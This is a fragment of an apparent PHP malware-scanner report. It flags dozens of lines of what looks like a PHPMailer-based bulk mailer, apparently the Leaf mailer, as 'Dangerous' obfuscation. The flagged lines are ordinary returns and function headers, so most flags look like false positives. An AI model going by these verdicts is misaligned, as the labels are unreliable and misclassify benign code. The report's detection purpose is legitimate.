<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3900</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3918</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3928</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3929</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3932</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3953</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3959</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3964</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3970</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3982</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4001</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4016</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4041</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4052</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4062</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4232</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4243</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4263</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4302</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4325</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
